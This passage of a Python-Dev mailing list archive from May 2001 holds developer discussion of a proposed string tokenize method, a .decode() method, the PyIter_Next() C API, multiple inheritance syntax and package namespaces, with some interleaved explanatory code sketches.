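    # Instance -> class -> base classes: the metaclass is not consulted.
    try:
        return K().greeting
    except AttributeError:
        return "AttributeError"
```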

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Fri May  4 10:04:08 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 11:04:08 +0200
Subject: [Python-Dev] "".tokenize() ?
Message-ID: <3AF27088.DE495210@lemburg.com>

Gustavo Niemeyer submitted a patch which adds a tokenize like
method to strings and Unicode:

"one, two and three".tokenize([",", "and"])
-> ["one", " two ", "three"]

I like this method -- should I review the code and then check it in ?

PS: Haven't gotten any response regarding the .decode() method yet...
should I take this as "no objections" ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@pythonware.com  Fri May  4 10:57:19 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 11:57:19 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff>

mal wrote:


> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1.  method bloat.  not exactly something you do every day, and
when you do, it's a one-liner:

import re
def tokenize(string, ignore):
    return [word for word in re.findall(r"\w+", string) if word not in ignore]

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

-0.  method bloat.  we don't have asfloat methods on integers and
asint methods on strings either...

Cheers /F


From mal@lemburg.com  Fri May  4 11:16:16 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 12:16:16 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff>
Message-ID: <3AF28170.399C2A5@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1.  method bloat.  not exactly something you do every day, and
> when you do, it's a one-liner:
> 
> def tokenize(string, ignore):
>     return [word for word in re.findall(r"\w+", string) if word not in ignore]

This is not the same as what .tokenize() does: it cuts at each
occurrence of a substring rather than at words as in your example
(although I must say that list comprehension looks cool ;-).
 
> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> -0.  method bloat.  we don't have asfloat methods on integers and
> asint methods on strings either...

Well, we already have .encode() which interfaces to PyString_Encode(),
but no Python API for getting at PyString_Decode(). This is what
.decode() is for. Depending on the codecs you use, these two
methods can be very useful, e.g. for "fixing" line-endings or
hexifying strings. The codec concept can be used for far more
applications than just converting from and to Unicode.
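Here is a sketch of the kind of non-Unicode codec use MAL mentions. In present-day Python 3, the bytes-to-bytes codecs are reached through the module-level `codecs.encode()` and `codecs.decode()` functions rather than through string methods, and the pair is symmetric. `hexify` and `unhexify` are hypothetical helper names.

```python
import codecs

def hexify(data):
    # Encode bytes into their hexadecimal representation via the "hex" codec.
    return codecs.encode(data, "hex")

def unhexify(data):
    # The symmetric operation goes back through the same codec.
    return codecs.decode(data, "hex")
```

For example, `hexify(b"hi")` gives `b"6869"`, and `unhexify(b"6869")` gives `b"hi"` back.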

About rich method APIs in general: I like having rich method APIs,
since they make life easier (you don't have to reinvent the wheel 
every time you want a common job done). IMHO, too many
methods can never hurt, but I'm probably alone with that POV.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@pythonware.com  Fri May  4 11:50:06 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 12:50:06 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com>
Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff>

mal wrote:

> > > "one, two and three".tokenize([",", "and"])
> > > -> ["one", " two ", "three"]
> > >
> > > I like this method -- should I review the code and then check it in ?
> >
> > -1.  method bloat.  not exactly something you do every day, and
> > when you do, it's a one-liner:
> >
> > def tokenize(string, ignore):
> >     return [word for word in re.findall(r"\w+", string) if word not in ignore]
>
> This is not the same as what .tokenize() does: it cuts at each
> occurrence of a substring rather than at words as in your example

oh, I didn't see the spaces.  splitting on all substrings is even
easier (but perhaps a bit more obscure, at least when written
on one line):

import re
def tokenize(string, seps):
    return re.split("|".join(map(re.escape, seps)), string)
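To make the difference concrete, here are both readings side by side, plus a whitespace-stripping variant. The function names are hypothetical. Note that the substring-splitting version yields `' three'` with a leading space, not the `'three'` shown in the original example.

```python
import re

def tokenize_words(string, ignore):
    # First reading: extract words and drop the ignored ones.
    return [word for word in re.findall(r"\w+", string) if word not in ignore]

def tokenize_split(string, seps):
    # Second reading: split at every occurrence of any separator substring.
    return re.split("|".join(map(re.escape, seps)), string)

def tokenize_stripped(string, seps):
    # A hypothetical variant that also strips whitespace around each token.
    return [token.strip() for token in tokenize_split(string, seps)]
```

On `"one, two and three"` with `[",", "and"]`, `tokenize_split` returns `['one', ' two ', ' three']`.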

Cheers /F


From lkcl@samba-tng.org  Fri May  4 12:31:29 2001
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 4 May 2001 13:31:29 +0200
Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn]
Message-ID: <20010504133129.K26116@angua.rince.de>

hi there,

i thought it best to bring this to someone's attention.

the forkingmixin code keeps track of its children, plus
because it forks, there's no close_requests() to interfere
with the operation of the child etc. etc.

now, for some marginally bizarre reason, adding an
extra base class - BaseServer - has, i believe (without
proof, just a hunch), caused a bug in ThreadingMixIn to be
more likely to occur.

now, i wrote BaseServer in order to be able to overload
this for a server that reads from a SQL server table
and performs actions based on what it reads from there
(the name of a host and the name of a python script to
action on the host, from the database :) :)

... but i don't do threading.  python is my first
actual exposure to thread programming.  does anyone
have enough experience with threads to write something
in fewer lines and less time than this message?

all best,

luke

----- Forwarded message from noreply@sourceforge.net -----

Delivered-To: lkcl@angua.rince.de
Delivered-To: lkcl@samba.org
To: noreply@sourceforge.net
From: noreply@sourceforge.net
Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn
Date: Thu, 03 May 2001 16:26:12 -0700

Bugs item #417845, was updated on 2001-04-21 08:28
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Guido van Rossum (gvanrossum)
Summary: Python 2.1: SocketServer.ThreadingMixIn

Initial Comment:
SocketServer.ThreadingMixIn does not work properly
since it tries to close the socket of a request two
times.


From gward@python.net  Fri May  4 19:12:44 2001
From: gward@python.net (Greg Ward)
Date: Fri, 4 May 2001 14:12:44 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010504141244.A1167@gerg.ca>

On 03 May 2001, Paul F. Dubois said:
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Maybe I'm being thick, but don't you get the same effect by doing this:

class X (Y):
    _sfoo = Y.foo
    _sbar = Y.bar

...or would the "rename" syntax also hide the "foo" and "bar" names from
X's effective namespace[1]?  In that case, I guess some special syntax
is needed.

[1] "effective namespace" -- the union of X's class dict with all its
superclasses' dicts; not actually X's namespace, but the set of names you
can use in X.  I think.  Err, whatever.

        Greg


From gward@python.net  Fri May  4 19:15:51 2001
From: gward@python.net (Greg Ward)
Date: Fri, 4 May 2001 14:15:51 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <20010504141551.B1167@gerg.ca>

On 04 May 2001, M.-A. Lemburg said:
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
> 
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
> 
> I like this method -- should I review the code and then check it in ?

I concur with /F: -1 because you can do it easily with re.split().

        Greg
-- 
Greg Ward - Unix bigot                                  gward@python.net
http://starship.python.net/~gward/
I hope something GOOD came in the mail today so I have a REASON to live!!


From guido@digicool.com  Fri May  4 19:36:14 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:36:14 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT."
 <20010504141244.A1167@gerg.ca>
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
 <20010504141244.A1167@gerg.ca>
Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com>

> On 03 May 2001, Paul F. Dubois said:
> > 1. The simple case, X inherits from Y and in defining foo and bar needs to
> > use Y's version:
> > 
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):

[Greg Ward]
> Maybe I'm being thick, but don't you get the same effect by doing this:
> 
> class X (Y):
>     _sfoo = Y.foo
>     _sbar = Y.bar
> 
> ...or would the "rename" syntax also hide the "foo" and "bar" names from
> X's effective namespace[1]?  In that case, I guess some special syntax
> is needed.

Paul's point is that the rename thing makes it possible to deprecate
the form Y.foo, which is causing the basic ambiguity here.

> [1] "effective namespace" -- the union of X's class dict with all its
> superclasses' dicts; not actually X's namespace, but the set of names you
> can use in X.  I think.  Err, whatever.

Probably irrelevant.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Fri May  4 19:38:06 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:38:06 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT."
 <20010504141551.B1167@gerg.ca>
References: <3AF27088.DE495210@lemburg.com>
 <20010504141551.B1167@gerg.ca>
Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com>

> On 04 May 2001, M.-A. Lemburg said:
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> > 
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> > 
> > I like this method -- should I review the code and then check it in ?
> 
> I concur with /F: -1 because you can do it easily with re.split().

-1 also.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Fri May  4 19:51:26 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 4 May 2001 14:51:26 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>

[MAL]
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1 here.  Easily enough done via other means, and you just *know* different
people will want different variants of tokenization (e.g., nobody in their
right mind will want " two " coming back from that example, and, given that
it does, that it doesn't also return " three" is baffling).

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

+1 from me:  it's the other half of the existing .encode() method, and the
current lack of symmetry is icky.


From barry@digicool.com  Fri May  4 19:57:09 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Fri, 4 May 2001 14:57:09 -0400
Subject: [Python-Dev] Multiple inheritance
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
 <20010503131714.D21814@inetnebr.com>
Message-ID: <15090.64389.746625.331215@anthem.wooz.org>

>>>>> "JE" == Jeff Epler <jepler@inetnebr.com> writes:

    >> class X (Y rename foo as _sfoo, bar as _sbar ):

    | Why not let us spell this as:
    | 	class X(Y):
    | 		from Y import foo as _sfoo, bar as _sbar
    | 		...

>>>>> "NS" == Neil Schemenauer <nas@python.ca> writes:

    NS> This already has a meaning in Python.  Paul's suggested syntax
    NS> is pretty neat, IMHO.

Not if Y is a class though, right?  That would currently raise an
ImportError, so why not hijack it for this purpose?  I think it has a
natural and clear enough meaning without requiring additional
keywords, or complicating the base class specification syntax.
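Here is a quick check of both claims in present-day Python 3, on the assumption that 2.1 behaved the same in the respects that matter here. Inside a class body, the `Y` in `from Y import ...` is looked up as a module name, not as the class in scope. With no module called `Y`, the statement raises an ImportError subclass, as Barry says. If such a module does exist, the statement already has a meaning and silently imports from it, which is Neil's point. The fake module registered in `sys.modules` is purely illustrative, and the check assumes no real module named `Y` is installed.

```python
import sys
import types

class Y:
    def foo(self):
        return "method Y.foo"

def class_body_import():
    """Try Jeff's spelling inside a class body and report what happens."""
    try:
        class X(Y):
            # 'Y' in an import statement names a module, not the class above.
            from Y import foo as _sfoo
    except ImportError:  # ModuleNotFoundError is a subclass
        return "ImportError"
    return X._sfoo

# Normally there is no module called 'Y', so the statement fails.
first = class_body_import()

# If a module named 'Y' exists, the import binds its attribute instead.
fake = types.ModuleType("Y")
fake.foo = lambda self: "function from module Y"
sys.modules["Y"] = fake
try:
    second = class_body_import()
finally:
    del sys.modules["Y"]
```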

-Barry


From tim.one@home.com  Fri May  4 21:50:03 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 4 May 2001 16:50:03 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>

In spare moments, I've been plugging away at making various functions work
nicely with iterators (map, min, max, etc.).

Over and over this requires writing code of the form:

	op2 = PyIter_Next(it);
	if (op2 == NULL) {
		/* StopIteration is *implied* by a NULL return from
		 * PyIter_Next() if PyErr_Occurred() is false.
		 */
		if (PyErr_Occurred()) {
			if (PyErr_ExceptionMatches(PyExc_StopIteration))
				PyErr_Clear();
			else
				goto Fail;
		}
		break;
	}

This is wordy, obscure, and in my experience is needed every time I call
PyIter_Next().

So I'd like to hide this in PyIter_Next instead, like so:

/* Return next item.
 * If an error occurs, return NULL and set *error=1.
 * If the iteration terminated normally, return NULL and set *error=0.
 * Else return the next object and set *error=0.
 */
PyObject *
PyIter_Next(PyObject *iter, int *error)
{
	PyObject *result;
	if (!PyIter_Check(iter)) {
		PyErr_Format(PyExc_TypeError,
			     "'%.100s' object is not an iterator",
			     iter->ob_type->tp_name);
		*error = 1;
		return NULL;
	}
	result = (*iter->ob_type->tp_iternext)(iter);
	*error = 0;
	if (result)
		return result;
	if (PyErr_Occurred()) {
		if (PyErr_ExceptionMatches(PyExc_StopIteration))
			PyErr_Clear();
		else
			*error = 1;
	}
	/* Else StopIteration is implicit, and there is no error. */
	return NULL;
}

Then *calls* could be the simpler:

	op2 = PyIter_Next(it, &error);
	if (op2 == NULL) {
		if (error)
			goto Fail;
		break;
	}

Objections?  So far I'm almost the only user of PyIter_Next(); the only other
use is in ceval's FOR_ITER, which goes thru a similar dance.

However, I'm not clear on why FOR_ITER doesn't clear the exception if
PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
true -- that sure smells like a bug (but, if so, the change above would
squash it by magic).

Note that I'm not proposing to change the signature of the tp_iternext slot
similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.


From guido@digicool.com  Fri May  4 23:03:36 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 17:03:36 -0500
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400."
 <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>
Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>

> In spare moments, I've been plugging away at making various functions work
> nicely with iterators (map, min, max, etc.).

For which efforts I extend my greatest thanks!

> Over and over this requires writing code of the form:
> 
[etc.]
> 
> This is wordy, obscure, and in my experience is needed every time I call
> PyIter_Next().
> 
> So I'd like to hide this in PyIter_Next instead, like so:
> 
> /* Return next item.
>  * If an error occurs, return NULL and set *error=1.
>  * If the iteration terminated normally, return NULL and set *error=0.
>  * Else return the next object and set *error=0.
>  */
> PyObject *
> PyIter_Next(PyObject *iter, int *error)
> {
[etc.]
> }

> Then *calls* could be the simpler:
> 
> 	op2 = PyIter_Next(it, &error);
> 	if (op2 == NULL) {
> 		if (error)
> 			goto Fail;
> 		break;
> 	}

I originally had this API for tp_iternext, and changed it to the
current API because I got tired of having to declare the error
variable.

How about making PyIter_Next() call PyErr_Clear() when the exception
is StopIteration?

Then calls could be

    op2 = PyIter_Next(it);
    if (op2 == NULL) {
        if (PyErr_Occurred())
            goto Fail;
        break;
    }

This is a tad slower and arguably generates more code (assuming an
extra call is slower than passing an extra argument and loading it)
but doesn't require declaring the error variable.

But since you're the customer, it's your choice.
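Later versions of Python gained a Python-level analogue of this convention. The two-argument form of the built-in `next()` swallows StopIteration and returns a default, while any other exception still propagates. The sketch below writes Guido's proposed caller pattern that way. `sum_items`, `failing_iter`, `error_propagates` and `_SENTINEL` are hypothetical names.

```python
_SENTINEL = object()

def sum_items(iterable):
    """Sum an iterable using the 'NULL plus error check' calling pattern."""
    it = iter(iterable)
    total = 0
    while True:
        # Like the revised PyIter_Next: StopIteration is swallowed and
        # reported via a sentinel; any other exception propagates.
        item = next(it, _SENTINEL)
        if item is _SENTINEL:
            break  # normal end of iteration, no error
        total += item
    return total

def failing_iter():
    yield 1
    yield 2
    raise ValueError("boom")

def error_propagates():
    # A real error must not be mistaken for end-of-iteration.
    try:
        sum_items(failing_iter())
    except ValueError:
        return True
    return False
```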

> Objections?  So far I'm almost the only user of PyIter_Next(); the only other
> use is in ceval's FOR_ITER, which goes thru a similar dance.
> 
> However, I'm not clear on why FOR_ITER doesn't clear the exception if
> PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
> true -- that sure smells like a bug (but, if so, the change above would
> squash it by magic).

Smells like a bug indeed.

> Note that I'm not proposing to change the signature of the tp_iternext slot
> similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Fri May  4 22:18:16 2001
From: tim.one@home.com (Tim Peters)
Date: Fri, 4 May 2001 17:18:16 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFMKAAA.tim.one@home.com>

[Tim]
>> In spare moments, I've been plugging away at ... iterators

[Guido]
> For which efforts I extend my greatest thanks!

Yet but a pale reflection of the thanks I extend to you for implementing
these guys to begin with:  they're *loads* of fun!  But not nearly as much
fun as playing with Perl, so they're still prudently Pythonic <wink>.

[T proposed adding an int* error arg to PyIter_Next()]

[G]
> How about making PyIter_Next() call PyErr_Clear() when the exception
> is StopIteration?
>
> Then calls could be
>
>     op2 = PyIter_Next(it);
>     if (op2 == NULL) {
>         if (PyErr_Occurred())
>             goto Fail;
>         break;
>     }

Perfect.  I'll do that later tonight, and update the PEP to match.

> This is a tad slower and arguably generates more code (assuming an
> extra call is slower than passing an extra argument and loading it)
> but doesn't require declaring the error variable.

Well, it's two more calls (since PyErr_Occurred() also makes a call to get
the thread state), but I don't really care because the client only does this
in case of error or end-of-iteration (which aren't the normal cases).  I was
dreading finding a spare int var to pass inside FOR_ITER anyway <wink>.


From paulp@ActiveState.com  Sat May  5 01:03:05 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Fri, 04 May 2001 17:03:05 -0700
Subject: [Python-Dev] ::
Message-ID: <3AF34339.9C553704@ActiveState.com>

I'll throw out a partially formed thought in case it is useful to
anybody.

"::" might be useful to solve another problem I've been struggling with:
how to have multiple package distributions share a namespace
(xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). 

"::" might mean, in general, that you are walking through abstract,
potentially merged namespaces and not through concrete dictionary
implementations. I think that Python's using the same syntax for package
namespaces and attribute accesses might seem more elegant than it is in
practice. Things that "seem like" they should work do not because
packages are fundamentally different than attributes:

>>> from xml import dom.minidom
  File "<stdin>", line 1
    from xml import dom.minidom
                       ^
SyntaxError: invalid syntax

Why isn't this symmetric? I would like to use "." on either side of the
import

>>> import xml
>>> print xml.dom
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'xml' module has no attribute 'dom'
>>> from xml.dom import minidom
>>> print xml.dom
<module 'xml.dom' from 'c:\program files\python21\lib\xml\dom\__init__.pyc'>

I find it a little bit weird that importing one module has the side
effect of populating a package.
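The side effect Paul describes is easy to reproduce with a throwaway package. A sketch, assuming a modern Python 3 importlib rather than the 2.1 interpreter shown above; the package name demopkg and the helper are hypothetical:

```python
import importlib
import os
import sys
import tempfile


def submodule_binding_demo(pkg_name="demopkg"):
    """Return (bound_before, bound_after) for pkg.sub around importing pkg.sub.leaf.

    Builds a throwaway tree on disk: pkg/__init__.py, pkg/sub/__init__.py
    and pkg/sub/leaf.py.  pkg_name is a hypothetical package name.
    """
    root = tempfile.mkdtemp()
    sub_dir = os.path.join(root, pkg_name, "sub")
    os.makedirs(sub_dir)
    for init in (os.path.join(root, pkg_name, "__init__.py"),
                 os.path.join(sub_dir, "__init__.py")):
        open(init, "w").close()  # an empty __init__.py marks a regular package
    with open(os.path.join(sub_dir, "leaf.py"), "w") as f:
        f.write("VALUE = 42\n")

    sys.path.insert(0, root)
    importlib.invalidate_caches()  # make sure the finders see the new files
    try:
        pkg = importlib.import_module(pkg_name)
        bound_before = hasattr(pkg, "sub")  # only the package itself is loaded
        importlib.import_module(pkg_name + ".sub.leaf")
        bound_after = hasattr(pkg, "sub")   # importing the submodule bound pkg.sub
        return bound_before, bound_after
    finally:
        sys.path.remove(root)
        for name in list(sys.modules):
            if name == pkg_name or name.startswith(pkg_name + "."):
                del sys.modules[name]
```

This should return (False, True): the package object gains the sub attribute only once something imports the submodule, the same effect seen with xml.dom above.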
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido@digicool.com  Sat May  5 04:07:56 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 22:07:56 -0500
Subject: [Python-Dev] ::
In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST."
 <3AF34339.9C553704@ActiveState.com>
References: <3AF34339.9C553704@ActiveState.com>
Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com>

> I find it a little bit weird that importing one module has the side
> effect of populating a package.

That's just because you've seen too much Java. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Sat May  5 09:13:30 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 05 May 2001 10:13:30 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
Message-ID: <3AF3B62A.50DD4115@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Gustavo Niemeyer submitted a patch which adds a tokenize-like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1 here.  Easily enough done via other means, and you just *know* different
> people will want different variants of tokenization (e.g., nobody in their
> right mind will want " two " coming back from that example, and, given that
> it does, that it doesn't also return " three" is baffling).

Ok. I rejected the patch with a mild response to take on this by
subclassing strings in Python 2.2 ;-)
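Tim's point that this is easily done via other means can be illustrated with re.split(). A minimal sketch; tokenize() and tokenize_stripped() are hypothetical helper names, not the method from Gustavo's patch:

```python
import re


def tokenize(text, separators):
    """Split `text` on any of the literal `separators` (hypothetical helper)."""
    # re.escape() keeps separators such as "." or "+" from acting as regex syntax.
    pattern = "|".join(re.escape(sep) for sep in separators)
    return re.split(pattern, text)


def tokenize_stripped(text, separators):
    """Variant that also trims surrounding whitespace from each token."""
    return [token.strip() for token in tokenize(text, separators)]
```

Here tokenize("one, two and three", [",", "and"]) returns ['one', ' two ', ' three'], keeping the leading space on ' three' consistently, and tokenize_stripped() gives ['one', 'two', 'three']. Plain substring matching also splits inside words (tokenize("sandwich", ["and"]) gives ['s', 'wich']), which is the kind of variant Tim expects different people to want handled differently.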

> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> +1 from me:  it's the other half of the existing .encode() method, and the
> current lack of symmetry is icky.

Right.

If I hear no strong objections, I'll check in the .decode()
method next week.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Sat May  5 12:45:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 06:45:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200."
 <3AF0662D.48671B4E@lemburg.com>
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
 <3AF0662D.48671B4E@lemburg.com>
Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com>

> I've attached the patch. Due to a small reorganisation the
> patch is a little longer -- symmetry has its price at C level
> too ;-)

Looks good on paper, so go ahead and check it in.  Watch out for
potential changes caused by Tim's iter-crusade!  :-)

While you're at it, why don't you check in the rot13 codec you posted
-- it's good to have simple examples in the standard library.
It would also be cool to have codecs for common file encodings like
base64, quoted-printable, binhex, uuencode, and even hex
(binascii.hexlify).
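For comparison, modern Python 3 (3.4 and later, well after this thread) exposes rot13, base64 and hex as codecs through codecs.encode() and codecs.decode(), since in Python 3 str has no .decode() method and bytes.decode() only accepts text encodings. A small round-trip sketch; roundtrip() is a hypothetical helper:

```python
import codecs


def roundtrip(data, encoding):
    """Encode `data` with a codec, then decode it back; return both results."""
    encoded = codecs.encode(data, encoding)
    return encoded, codecs.decode(encoded, encoding)
```

For example, roundtrip("Hello", "rot13") gives ('Uryyb', 'Hello') and roundtrip(b"hi", "hex") gives (b'6869', b'hi').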

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sat May  5 13:15:52 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:15:52 -0500
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200."
 <3AF3B62A.50DD4115@lemburg.com>
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
 <3AF3B62A.50DD4115@lemburg.com>
Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com>

> Ok. I rejected the patch with a mild response to take on this by
> subclassing strings in Python 2.2 ;-)

Gustavo didn't take the rejection well.  He contacted me asking for a
better explanation, and we got into a bit of an argument about how
much I must explain my decisions, but I think he understands now.

> If I hear no strong objections, I'll check in the .decode()
> method next week.

Yes, see my previous reply.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Sat May  5 13:24:19 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:24:19 -0500
Subject: [Python-Dev] PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST."
 <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net>
References: <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>

In a checkin message, Tim wrote:
> The full story for instance objects is pretty much unexplainable, because
> instance_contains() tries its own flavor of iteration-based containment
> testing first, and PySequence_Contains doesn't get a chance at it unless
> instance_contains() blows up.  A consequence is that
>     some_complex_number in some_instance
> dies with a TypeError unless some_instance.__class__ defines __iter__ but
> does not define __getitem__.

This kind of thing happens everywhere -- instances always define all
slots but using the slots sometimes fails when the corresponding
__foo__ doesn't exist.  Decisions based on the presence or absence of
a slot are therefore in general not reliable; the only exception is
the decision to *call* the slot or not.  The correct solution is not
to catch AttributeError and pretend that the slot didn't exist (which
would mask an AttributeError occurring inside the __contains__ method
if there was one), but to reimplement the default behavior in the
instance slot implementation.

In this case, that means that PySequence_Contains() can be simplified
(no need to test for AttributeError), and instance_contains() should
fall back to a loop over iter(self) rather than trying to use
instance_item().
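The approach Guido recommends can be sketched in Python: look up __contains__ without calling it, and if it is absent, reimplement the default behaviour as a loop over iter(self) with == comparisons. This is an illustration under those assumptions, not the actual instance_contains() code; contains() is a hypothetical name.

```python
def contains(container, x):
    """Rough sketch of how 'x in container' could be dispatched.

    __contains__ is only looked up on the type here (never called inside
    the check), so an AttributeError raised *inside* a __contains__ method
    propagates instead of being mistaken for "no such slot".
    """
    method = getattr(type(container), "__contains__", None)
    if method is not None:
        return bool(method(container, x))
    # Default behaviour, reimplemented: loop over iter(container).  iter()
    # itself falls back to the old __getitem__(0), __getitem__(1), ... protocol.
    for item in iter(container):
        if item is x or item == x:
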